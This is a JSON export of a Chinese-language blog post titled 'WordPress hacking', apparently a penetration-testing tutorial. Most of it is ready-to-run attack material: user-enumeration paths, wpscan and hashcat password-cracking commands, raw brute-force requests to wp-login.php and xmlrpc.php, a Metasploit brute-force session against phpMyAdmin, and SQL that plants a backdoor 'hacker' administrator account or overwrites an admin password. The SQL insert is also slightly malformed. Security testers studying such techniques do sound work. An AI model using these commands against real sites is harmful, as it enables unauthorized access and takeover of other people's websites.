{"id":15,"date":"2023-10-15T12:50:28","date_gmt":"2023-10-15T04:50:28","guid":{"rendered":"http:\/\/54.254.190.68\/note\/archives\/15"},"modified":"2024-09-03T11:36:51","modified_gmt":"2024-09-03T03:36:51","slug":"burpsuite-dom-invader","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/15","title":{"rendered":"WordPress hacking"},"content":{"rendered":"\n<p>WordPress\u662f\u4e00\u500b\u4ee5PHP\u548cMySQL\u70ba\u5e73\u53f0\u7684\u81ea\u7531\u958b\u6e90\u7684\u90e8\u843d\u683c\u8edf\u9ad4\u548c\u5167\u5bb9\u7ba1\u7406\u7cfb\u7d71\u3002\u6839\u64da\u7d71\u8a08\uff0cWordPress\u662f\u6700\u5e38\u88ab\u99ed\u5ba2\u653b\u64ca\u7684\u76ee\u6a19\u3002<\/p>\n\n\n\n<p>\u5e38\u898b\u7684\u5a01\u8105\u4e3b\u8981\u6709\u4e09\u500b<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u7372\u53d6\u654f\u611f\u4fe1\u606f<\/li>\n\n\n\n<li>\u7206\u7834\u5bc6\u78bc<\/li>\n\n\n\n<li>\u5de5\u5177\u6383\u63cf<\/li>\n<\/ul>\n\n\n\n<div style=\"height:100px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">\u654f\u611f\u4fe1\u606f<\/h2>\n\n\n\n<p>\u5e38\u898b\u65b9\u6cd5\u6709\u4ee5\u4e0b\u5e7e\u7a2e<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u67e5\u8a62wordpress\u7248\u672c<\/h3>\n\n\n\n<p>\u8a2a\u554f \/?feed=rss2 \u6216 \/feed\uff0c\u6703\u8fd4\u56de\u4ee5\u4e0b\u5167\u5bb9\uff0c\u53ef\u77e5\u9053\u7248\u672c<br><code>&lt;generator&gt;https:\/\/wordpress.org\/?v=6.5.3&lt;\/generator&gt;<\/code><\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u67e5\u8a62wordpress\u76f8\u95dc\u65e5\u8a8c<\/h3>\n\n\n\n<p>\u53ef\u8a2a\u554f\u4ee5\u4e0b\u4f4d\u7f6e\u641c\u96c6\u60c5\u5831<\/p>\n\n\n\n<p><code>\/wp-content\/debug.log<\/code><\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u53d6\u5f97\u7db2\u7ad9\u7684\u7528\u6236\u540d<\/h3>\n\n\n\n<p>\u53ef\u8a2a\u554f\u4ee5\u4e0b\u4f4d\u7f6e\u641c\u96c6\u60c5\u5831<\/p>\n\n\n\n<p><code>\/?author=1<\/code><\/p>\n\n\n\n<p><code>\/wp-json\/wp\/v2\/users<\/code><\/p>\n\n\n\n<p><code>\/?rest_route=\/wp\/v2\/users<\/code><\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u6aa2\u67e5\u662f\u5426\u958b\u555f\u7528\u6236\u8a3b\u518a<\/h3>\n\n\n\n<p>\u53ef\u8a2a\u554f\u4ee5\u4e0b\u4f4d\u7f6e\u641c\u96c6\u60c5\u5831<\/p>\n\n\n\n<p><code>\/wp-login.php?action=register<\/code><\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u6aa2\u67e5xmlrpc.php<\/h3>\n\n\n\n<p>xmlrpc.php\u5728\u4f4e\u7248\u672c\uff083.6.1\u4ee5\u4e0b\uff09\u5b58\u5728 ssrf \u53ef\u4ee5\u5617\u8a66\u8b80\u53d6\u6587\u4ef6\uff0c\u5176\u4ed6\u7248\u672c\u53ef\u4ee5\u4f7f\u7528\u5b83\u4f86\u7206\u7834\u5bc6\u78bc<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u5bc6\u78bc\u7206\u7834<\/h2>\n\n\n\n<p>\u5e38\u898b\u65b9\u6cd5\u6709\u4ee5\u4e0b\u5e7e\u7a2e<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u900f\u904ewpscan \u7206\u7834\u9032\u5165\u5f8c\u53f0<\/h3>\n\n\n\n<p>\u4f7f\u7528wpscan\u9810\u8a2d\u5b57\u5178\u7206\u7834\u7528\u6236\u540d<\/p>\n\n\n\n<p><code>sudo wpscan --url \"http:\/\/www.wptest.com\" -e u<\/code><\/p>\n\n\n\n<p>\u4f7f\u7528\u6307\u5b9a\u5b57\u5178\u7206\u7834\u4f7f\u7528\u8005\u540d\u7a31\u548c\u5bc6\u78bc<\/p>\n\n\n\n<p><code>sudo wpscan --url \"http:\/\/www.wptest.com\" -U \/usr\/share\/wordlists\/wfuzz\/others\/names.txt -P \/usr\/share\/wordlists\/rockyou.txt<\/code><\/p>\n\n\n\n<p>\u91dd\u5c0d\u7528\u6236\u540d\u7206\u7834\u5bc6\u78bc<\/p>\n\n\n\n<p><code>sudo wpscan --url \"http:\/\/www.wptest.com\" -U admin -P \/usr\/share\/wordlists\/rockyou.txt<\/code><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">wp-login.php<\/h3>\n\n\n\n<p>\u76f4\u63a5\u767b\u5165\u7206\u7834\u5f8c\u53f0\u5e33\u865f\u5bc6\u78bc\uff08\u5efa\u8b70\u4f7f\u7528 burp \u6293\u5305\u9032\u884c\u7206\u7834\uff09<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/wp-login.php HTTP\/1.1\nHost: target.com\n\nlog=admin&amp;pwd=BRUTEFORCE_IN_HERE&amp;wp-submit=Log+In&amp;redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&amp;testcookie=1<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">xmlrpc.php<\/h3>\n\n\n\n<p>\u900f\u904e xmlrpc.php \u4f86\u6279\u6b21\u7206\u7834\u4f7f\u7528\u8005\u540d\u7a31\u548c\u5bc6\u78bc\uff08\u901f\u5ea6\u5f88\u5feb\uff09,\u900f\u904e\u4fee\u6539\u6a19\u7c64\u4f86\u6279\u6b21\u7206\u7834\u4f7f\u7528\u8005\u540d\u7a31\u6216\u5bc6\u78bc<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/xmlrpc.php HTTP\/1.1\nHost: target.com\n\n&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;\n&lt;methodCall&gt;\n&lt;methodName&gt;wp.getUsersBlogs&lt;\/methodName&gt;\n&lt;params&gt;\n&lt;param&gt;&lt;value&gt;user01&lt;\/value&gt;&lt;\/param&gt;\n&lt;param&gt;&lt;value&gt;pass01&lt;\/value&gt;&lt;\/param&gt;\n&lt;param&gt;&lt;value&gt;user02&lt;\/value&gt;&lt;\/param&gt;\n&lt;param&gt;&lt;value&gt;pass02&lt;\/value&gt;&lt;\/param&gt;\n&lt;\/params&gt;\n&lt;\/methodCall&gt;<\/code><\/pre>\n\n\n\n<p>ps:\u8981\u95dc\u9589XMLRPC\u7684\u529f\u80fd\uff0c\u4e3b\u8981\u6709\u56db\u500b\u65b9\u6cd5\uff0c\u53ef\u53c3\u8003 https:\/\/blog.hungwin.com.tw\/wordpress-disable-xmlrpc\/<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Hashcat\u89e3\u5bc6\u4f7f\u7528\u8005Hash<\/h3>\n\n\n\n<p>\u5982\u679c\u900f\u904esql\u6ce8\u5165\u6f0f\u6d1e\u67e5\u8a62\u5230\u4f7f\u7528\u8005\u7684Hash\uff0c\u53ef\u4ee5\u7528Hashcat \u7834\u89e3\u76f8\u5c0d\u61c9\u7684Hash \u9032\u5165\u5f8c\u53f0<\/p>\n\n\n\n<p>\u5047\u5982hash\u70ba$P$B7ak3qT3j.2y3UPGato2rbatl58FIF\uff0c\u4f7f\u7528rockyou\u5b57\u5178\u6a94\u7834\u89e3wordpress\u5bc6\u78bc\u65b9\u5f0f\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># echo $P$B7ak3qT3j.2y3UPGato2rbatl58FIF &gt; hash.txt\n# sudo hashcat -a 0 -m 400 hash.txt \/usr\/share\/wordlists\/rockyou.txt<\/code><\/pre>\n\n\n\n<p>\u76f8\u95dc\u53c3\u6578\u8aaa\u660e\u5982\u4e0b<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>-m 400 \u6307\u5b9a\u6b63\u5728\u7834\u89e3\u7684\u96dc\u6e4a\u985e\u578b\uff08phpass\uff09<\/li>\n\n\n\n<li>-a 0 \u8868\u793a\u5b57\u5178\u653b\u64ca<\/li>\n<\/ul>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u5165\u4fb5phpmyadmin\u4fee\u6539\uff37ordpress\u7ba1\u7406\u54e1\u5bc6\u78bc<\/h3>\n\n\n\n<p>\u900f\u904e\u6383\u63cf\u76ee\u9304\u5f97\u5230phpmyadmin\u4f4d\u7f6e\uff0c\u7136\u5f8c\u7206\u7834\u6216\u5176\u4ed6\u65b9\u5f0f\u5f97\u5230\u767b\u9304\u5bc6\u78bc\u3002\u5165\u4fb5\u9032\u53bb\u5f8c\u5728\u53d6\u4ee3\u6216\u4fee\u6539\u76f8\u95dc\u7ba1\u7406\u54e1\u7684Hash\u4f86\u6210\u529f\u767b\u9304wordpress\u7684\u5f8c\u53f0<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u900f\u904e\uff2dSF\u7206\u7834phpmyadmin\u7684root\u5bc6\u78bc<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>msf&gt; use auxiliary\/scanner\/http\/phpmyadmin_login\nmsf auxiliary(scanner\/http\/phpmyadmin_login)&gt; set rhosts www.wptest.com\nmsf auxiliary(scanner\/http\/phpmyadmin_login)&gt; set rport 80\nmsf auxiliary(scanner\/http\/phpmyadmin_login)&gt; set targeturi \/phpmyadmin\/index.php\nmsf auxiliary(scanner\/http\/phpmyadmin_login)&gt; set threads 100\nmsf auxiliary(scanner\/http\/phpmyadmin_login)&gt; set stop_on_success true\nmsf auxiliary(scanner\/http\/phpmyadmin_login)&gt; set username root\nmsf auxiliary(scanner\/http\/phpmyadmin_login)&gt; set pass_file \/usr\/share\/wordlists\/metasploit\/password.lst\nmsf auxiliary(scanner\/http\/phpmyadmin_login)&gt; set user_as_pass true\nmsf auxiliary(scanner\/http\/phpmyadmin_login)&gt; run<\/code><\/pre>\n\n\n\n<p>\u4ee5\u4e0b\u8a3b\u91cb\u70ba\u4e0b\u9762\u547d\u4ee4\u7684\u89e3\u91cb<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>use \u9032\u5165\u6a21\u7d44<\/li>\n\n\n\n<li>rhosts \u8a2d\u5b9a\u76ee\u6a19\u7684\u4f4d\u5740<\/li>\n\n\n\n<li>rport \u76ee\u6a19\u7aef\u53e3\uff0c\u6ce8\u610f https \u7684\u76ee\u6a19\u9700\u8981\u958b\u555f ssl \u70ba true<\/li>\n\n\n\n<li>targeturi \u8a2d\u5b9a\u76ee\u6a19 phpmyadmin \u7684 url \u8def\u5f91<\/li>\n\n\n\n<li>threads \u8a2d\u5b9a\u7dda\u7a0b\u6578<\/li>\n\n\n\n<li>stop_on_success \u7206\u7834\u6210\u529f\u4e00\u5c31\u505c\u6b62<\/li>\n\n\n\n<li>username \u8a2d\u5b9a\u4f7f\u7528\u8005\u540d\u7a31 <\/li>\n\n\n\n<li>user_file \u8a2d\u5b9a\u4f7f\u7528\u8005\u540d\u5b57\u5178<\/li>\n\n\n\n<li>pass_file \u8a2d\u5b9a\u7206\u7834\u5bc6\u78bc\u5b57\u5178<\/li>\n\n\n\n<li>user_as_pass \u628a\u4f7f\u7528\u8005\u4e5f\u7576\u4f5c\u5bc6\u78bc\u5617\u8a66<\/li>\n<\/ul>\n\n\n\n<h4 class=\"wp-block-heading\">\u7206\u7834\u6210\u529f\u5f8c\u65b0\u589e\u5e33\u865f\u6216\u4fee\u6539\u5bc6\u78bc<\/h4>\n\n\n\n<p>\u65b0\u589e\u5e33\u865fSQL\u8a9e\u6cd5\u5982\u4e0b\uff0chash\u5bc6\u78bc\u70baadminadmin<\/p>\n\n\n\n<p><code>INSERT INTO wp_users (ID, user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, `display_``)<br>(2, 'hacker', '$P$B7ak3qT3j.2y3UPGato2rbatl58FIF\/', 'admin', 'demo@xp.cn', '[http:\/\/www.wptest.com](http:\/\/www.wptest. com\/)', '2020-09-10 08:06:44', '', 0, 'admin');<\/code><\/p>\n\n\n\n<p>\u4fee\u6539\u5bc6\u78bcSQL\u8a9e\u6cd5\u5982\u4e0b\uff0cHash\u5bc6\u78bc\u70baadminadmin<\/p>\n\n\n\n<p><code>UPDATE wp_users SET user_pass=\"$P$B7ak3qT3j.2y3UPGato2rbatl58FIF\/\" WHERE ID = 2;<\/code><\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u5de5\u5177\u6383\u63cf<\/h2>\n\n\n\n<p>\u5e38\u898b\u6383\u63cf\u5de5\u5177\u6709\u4ee5\u4e0b3\u500b<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>wpscan<\/li>\n\n\n\n<li>WordPresscan<\/li>\n\n\n\n<li>wpscan-go<\/li>\n<\/ul>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">wpscan<\/h3>\n\n\n\n<p>\u4f7f\u7528wpscan \u9032\u884c\u6383\u63cf\uff0c\u5982\u679c\u6709<code>--api-token<\/code>\u6383\u63cf\u7684\u63d2\u4ef6\u53ef\u4ee5\u81ea\u52d5\u53bb\u5b98\u7db2\u9032\u884c\u76f8\u95dc\u6f0f\u6d1e\u7684\u67e5\u8a62\uff0c\u4e0d\u7136\u53ea\u80fd\u624b\u52d5\u5230\u5b98\u7db2\u9032\u884c\u76f8\u95dc\u6f0f\u6d1e\u7684\u67e5\u8a62<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u6383\u63cf\u76f8\u95dc\u5916\u639b\u7a0b\u5f0f\u6f0f\u6d1e<\/li>\n<\/ul>\n\n\n\n<p>\u6383\u63cf\u63d2\u4ef6\u6f0f\u6d1e\uff0c\u53ef\u5230https:\/\/wpscan.com\/plugins\u67e5\u8a62\u76f8\u95dc\u6f0f\u6d1e <\/p>\n\n\n\n<p><code>sudo wpscan --url \"http:\/\/www.wptest.com\" --enumerate p<\/code><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u6383\u63cf\u76f8\u95dc\u4e3b\u984c\u6f0f\u6d1e<\/li>\n<\/ul>\n\n\n\n<p>\u6383\u63cf\u4e3b\u984c\u76f8\u95dc\u6f0f\u6d1e\uff0c\u53ef\u5230https:\/\/wpscan.com\/themes\u67e5\u8a62\u76f8\u95dc\u6f0f\u6d1e <\/p>\n\n\n\n<p><code>sudo wpscan --url \"http:\/\/www.wptest.com\" --enumerate vt<\/code><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5176\u4ed6wpscan\u6383\u63cf\u6f0f\u6d1e\u547d\u4ee4<\/li>\n<\/ul>\n\n\n\n<p><code>sudo wpscan --url \"http:\/\/www.wptest.com\" --enumerate vp,vt,tt,u<\/code><\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">WordPresscan<\/h3>\n\n\n\n<p>WordPresscan\u662f\u4e00\u6b3e\u91dd\u5c0dwordpress\u7684\u6f0f\u6d1e\u6383\u63cf\u5de5\u5177\u3002\u8a72\u5c08\u6848\u4f7f\u7528python2\u958b\u767c\u7684\uff0c\u6240\u4ee5\u9700\u8981\u4f7f\u7528python2\u904b\u4f5c<\/p>\n\n\n\n<p>GithHub\u5c08\u6848\u7db2\u5740\uff1ahttps:\/\/github.com\/swisskyrepo\/Wordpresscan.git<\/p>\n\n\n\n<p>\u4f7f\u7528\u547d\u4ee4\u53c3\u8003\u5982\u4e0b<\/p>\n\n\n\n<p><code>python2 wordpresscan.py --aggressive --random-agent -u \"http:\/\/www.wptest.com\" --threads 100<\/code><\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">wpscan-go<\/h3>\n\n\n\n<p>wpscan\u662f\u7528Go\u958b\u767c\u7684CMS WordPress\u4e2d\u7684\u6f0f\u6d1e\u8fa8\u8b58\u5de5\u5177\u3002<\/p>\n\n\n\n<p>GithHub\u5c08\u6848\u7db2\u5740\uff1a<a href=\"https:\/\/github.com\/krishpranav\/wpscan\" target=\"_blank\" rel=\"noopener\">https:\/\/github.com\/krishpranav\/wpscan<\/a><\/p>\n\n\n\n<p>\u4f7f\u7528\u524d\u9700\u8981\u4e0b\u8f09\u9805\u76ee\u4e26\u9032\u884c\u7de8\u8b6f<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>git clone https:\/\/github.com\/krishpranav\/wpscan\ncd wpscan\ngo get\ngo build main.go<\/code><\/pre>\n\n\n\n<p>\u4f7f\u7528\u547d\u4ee4\u53c3\u8003\u5982\u4e0b<\/p>\n\n\n\n<p><code>.\/main -u \"http:\/\/www.wptest.com\" --aggressive-mode<\/code><\/p>\n","protected":false},"excerpt":{"rendered":"<p>WordPress\u662f\u4e00\u500b\u4ee5PHP\u548cMySQL\u70ba\u5e73\u53f0\u7684\u81ea\u7531\u958b\u6e90\u7684\u90e8\u843d\u683c\u8edf\u9ad4\u548c\u5167\u5bb9\u7ba1\u7406\u7cfb\u7d71\u3002\u6839\u64da\u7d71\u8a08\uff0cWordPress\u662f\u6700\u5e38\u88ab\u99ed\u5ba2\u653b\u64ca\u7684\u76ee\u6a19\u3002<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[39],"tags":[3],"class_list":["post-15","post","type-post","status-publish","format-standard","hentry","category-concept","tag-tool"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/15","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=15"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/15\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=15"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=15"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=15"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}